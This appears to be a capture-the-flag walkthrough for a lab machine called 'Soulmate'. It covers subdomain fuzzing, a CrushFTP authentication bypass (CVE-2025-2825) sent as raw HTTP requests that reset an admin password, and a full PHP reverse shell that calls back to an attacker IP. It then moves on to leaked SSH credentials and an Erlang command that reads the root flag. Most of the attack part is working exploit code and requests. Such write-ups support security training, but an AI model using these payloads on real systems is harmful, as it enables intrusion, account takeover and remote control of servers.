Soulmate - Easy

1st step :

nmap -sV -a 10.10.11.86 -vvv

2nd step :

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u <http://10.10.11.86> -H "Host:FUZZ.soulmate.htb" -fs 154

Sub-domain Enumeration

 using -fs to describe file size

3rd step :

from 2nd you get "ftp" as an output so you go int the site

4th step :

now from CVE of CrushFTP we get to know that unadd some parameters :-

GET /WebInterface/function/?command=getUserList&c2f=1111 HTTP/1.1
Host: target-server:8081
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZYMn1111
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/

refer the Screenshot!! "CrushFTP Authentication Bypass - CVE-2025-2825"

5th step :

Now you will get the usernames . but you also need an pass for same to login so now you will put a payload in the burpsuite and change the format to POST

POST /WebInterface/function/?c2f=1111 HTTP/1.1
Host: ftp.soulmate.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Authorization: AWS4-HMAC-SHA256 Credential=crushadmin/
Cookie: CrushAuth=1743113839553_vD96EZ70ONL6xAd1DAJhXMZfMn1111
Content-Length: 193
Connection: keep-alive

command=setUserItem&data_action=update&xmlItem=user&serverGroup=MainUsers&username=crushadmin&user=<?xml version="1.0" encoding="UTF-8"?><user type="properties"><password>uday</password></user>

6th step :

You will now be able to reset the pass and put your pass . NOW LOGIN IN the page and upload a reverse shell to get access to the registered users directory .

go in the current user and upload the php file

7th step :

no go on site for reverseshells - reverseshells.com

create a exploit of php - php monkey and open listner in one terminal

<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>
// Copyright (C) 2007 [email protected]

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.3';
$port = 4444;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit ($string) {
	if (!$daemon) {
		print "$string\\n";
	}
}

?>

8th step :

Now go in firefox and run the php exploit - http://ftp.soulmate.htb/amal.php

it will get captured in nc and now get the user flag

ps -ef --forest

9th step :

here is the flag you will get the user flag here-

cat /usr/local/lib/erlang_login/start.escript

{user_passwords, [{"ben", HouseH0ldings998"
"}]},
{idle_time, infinity},
{max_channels, 10},
{max_sessions, 10},
{parallel_login, true}

10th :

now you will get the password of the ben user then do ssh and enter the password and in that you will get the user.txt file in which you will get the flag (all should be done in shell

ssh [email protected]

11th :

now look into running ports . you eill get to know that port 2222 is running .

netstat -tulnp or -ant

12th :

now to get the root flag we will do will the users password we got in 9th step :

 ssh [email protected] -p 2222

13th :

after logining we will use er-lang sysntex to get our command worked in cmd of the system

os:cmd("cat /root/root.txt").

Enjoy..

PreviousSteamCloud - Easy NextCAP - Easy

Last updated 3 hours ago

Was this helpful?